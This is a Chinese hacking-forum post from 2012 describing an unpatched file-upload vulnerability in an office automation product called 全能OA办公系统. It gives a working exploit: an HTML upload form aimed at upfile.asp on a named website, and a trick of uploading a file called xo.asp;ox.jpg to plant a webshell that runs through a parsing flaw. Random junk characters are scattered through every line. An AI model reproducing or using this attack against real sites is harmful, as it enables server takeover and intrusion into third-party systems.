找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2279|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
" ?4 t( {) i8 M2 |/ _8 x0 Z# ^) [4 x( ?
系统介绍:0 ?6 e% n- I! n; U  n- ?

/ g2 Q9 F; j; o+ z9 V! Z! q全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。0 u+ L) r2 P  i% L8 Y9 }3 Y3 e

9 Q( I, A9 R# ^$ ^. w. O( t/ \主要功能:
/ `" C, k0 b5 W8 X公司通告 & z7 Y7 k# ]4 Q2 o3 @% A, o
工作计划 5 {% ]2 R% ]3 K. R. q  S1 ^8 S) J
通讯助理 ' E3 @7 u6 w+ g3 n0 ^- h% F1 Y5 K
客户资源
+ W- `7 p3 x! J/ }) x8 X, Q8 N我的公文 , L  ~$ [" U8 w* M% ?
公文传阅
- ^- Z, C4 H0 c/ E2 E- ~! g公共资源
! k) O; w3 R" |资源预约
& \! h8 b9 H) O* q; Q, z/ }$ J2 ]今日考勤 % q, j2 S, H* `5 Q* ?5 ~) V
个人计划 % k; i# Q( j: T! d# m3 V% ]
个人通讯录
) }* i/ b. e6 h7 f7 V8 o个人基本档案
5 y3 x% ]2 {; Q' C4 A$ w/ g未读邮件
$ n3 o7 [% ~  c0 Y8 G# z/ J发邮件 2 p  ?' L' p6 X8 K
收件夹 . K* l: |' W  Z# d, q0 E
寄件夹
( L' K5 L* |+ J2 {1 F4 E网络硬盘
9 M1 Q+ Q+ T; N' t+ i; J6 i. {网络会议
9 J5 M" V4 a3 A& L4 U# T; v2 ^网络调查
2 }% {( T0 I9 w, t/ ^) R) k7 }8 w交流论坛
; h6 m& y9 b( r! b( T7 J
2 q; \& V# t5 O) L: [有兴趣测试的朋友可以下源码看看5 S, n' d& `  K
5 h6 A; V9 P2 f* P1 Q
源码下载:6 ^& J4 \! g! E/ q
+ }; Y# v# ^3 c# X' T
http://www.mycodes.net/30/4750.htm0 P) V  g/ K9 ?* @

6 P0 u. j6 E! g2 Z2 A/ D& P# G- l漏洞介绍:; G* m' d) w1 s4 r8 y
: r! n' t' G* Y' O" `: E
由upfile.asp上传文件漏洞引起5 M! ?) p" [: ?* V- B3 M! D+ X& o" z' }

5 G; \2 T: H  h/ S' y$ n6 z测试方法:
$ X9 i; I3 @4 M% w1 a( U1 ]' c% Y1 x
使用名小子上传http://www.itlynn.com/upfile.asp即可0 F  L0 C9 S5 o! w1 B' }# j
# r/ B8 _$ w/ ^. c- B2 h' Q
如果upfile.asp文件被删除不存在。# y# {2 C1 }% v9 ^, a. n/ g) e1 i

) a7 m5 }* p) s4 p0 {  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp, E1 S( ?0 f- s

+ c% m. {4 Q  Z; @: C7 d0 j  n如果存在那么将如下代码保存为upfile.html。
* \# b$ m+ C; z$ F8 w
0 B% w3 [& w: k! W# u然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp# d# E0 c. b# c# u, G

7 d1 W! S' Z. f4 M
2 o* ]( s$ r2 Y# I: _, ]6 g7 s/ n4 m7 a# {% g6 |
01 <table border='0' align="center" cellpadding="5"> 8 ^9 Z4 O/ Y& E) }" ]6 x

2 n# j$ z+ _! n02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> # i3 y. H* K7 L+ C% k3 Q

% W" D3 r9 s7 J$ U1 b8 d03 <tr>
' Z$ t0 i- w8 I, G$ Q  w: f8 Y3 h5 Y$ [8 i
04             <td>报错:</td>
4 M  E  b5 R" [$ G! r/ n6 v: `  ]! I' q/ Y, U: [
05             <td><input type='radio' name='errnumber' value='0'> 6 _7 n, T% L3 O9 i, t; Y( }

; O2 B; w6 J2 ]; u/ D3 Z06               自动更名 8 ]7 I2 f' {! `/ N) ~( L0 y
" _; H  A" |3 d  I7 W
07               <input type='radio' name='errnumber' value='1' checked>
/ e& p/ m* C. n: @7 p9 C/ }
. K) @, y  z: c# N, ?% k$ Y08               报错方式 3 Z+ N' m3 O. V+ b

  ]8 u1 f* i- I: P$ g% o09               <input type='radio' name='errnumber' value='2'> 7 r* V/ q; j+ Z: O/ m, t

" N9 V6 [: s. ]4 L& m10               直接覆盖</td>
4 L, h2 U+ ^& }' x0 ^
( o; z0 P; S1 o% T11           </tr>
: o, L: \# B& n7 I: f3 Q4 N
1 ?+ Y6 C. q3 R- R- S8 a12           <tr> 1 }' v1 |& \# Y
  v3 S4 N7 c- \4 ~. t5 Y! |. `6 F! L
13             <td>主题:</td>
3 ~+ ^. i$ p% a/ j) z5 x- [5 j. `& e5 j
14             <td><input type='text' name='filename' size='30'></td> 2 A8 `7 h  E5 L' H4 h8 L
; h/ g$ U" J' ~7 y: h2 W* K
15           </tr> ; |& k9 o( \' B2 r8 Y* v. u
, c; k, b* k- u9 p
16           <tr> / f; T/ T7 }( j4 F
5 N! N% l$ M" o) k8 d
17             <td>文件:</td>
% R5 \7 K7 S0 T2 S0 T
9 W& j3 Y; c3 Z18             <td><input type="file"name="fruit"size="30"></td> ; i6 u4 {1 r% Q9 g2 @/ S' X+ P
2 F3 E  z- @1 u( Z7 c
19           </tr>
  v- m) V' P4 \9 M3 h7 F1 w/ _
4 H3 a$ A) B. s+ y( h' R20           <tr>
1 x- a% d- T6 Z$ ~- s' s
+ v6 |- ^! B% i  V( f. N9 m% L21             <td valign='top'>简介:</td>
) z9 s) N. u# p1 c- n$ h+ B
. h" y) D- [6 {. S$ Z22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
: R' M; \) W6 }+ y2 x
4 d' F$ S0 p/ C/ A- ^4 X% S23           </tr>
3 U% t" E! J1 V$ u# S9 k
/ F2 Z! q2 w2 o9 D/ X0 Y/ D* h! r24   , F" H0 s7 p7 C6 H

7 {7 E8 r7 b" p$ y; c25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> / Z& P: z8 v! K* T0 H
( g1 m: }7 g2 H. {+ @
26           </tr> - w) W% N7 E8 ]. I+ i2 D- H6 {
8 [+ g! a1 Y/ l4 |8 I! w& K) s
27         </form>
" f9 V. m- k5 I5 D) \' n) P/ K! a$ V
  F' |2 k0 B2 m) q, g7 L" n: g然后打开上传一个文件名为xo.asp;ox.jpg的文件。
8 w- d/ l, w6 W# Q  V- u6 R- ^" t7 {  G* ~/ f+ B( p- _
0 P4 {/ y" N3 c2 H' \
. O9 P# \. w7 R) G5 f
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
7 a2 O1 F' ~+ t2 a  N$ Q) a8 y( b) z# n; V/ ^/ [
此漏洞需要配合解析漏洞利用。: P* h7 |8 o7 @* O# F! k' a
- R: p7 s  k5 M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表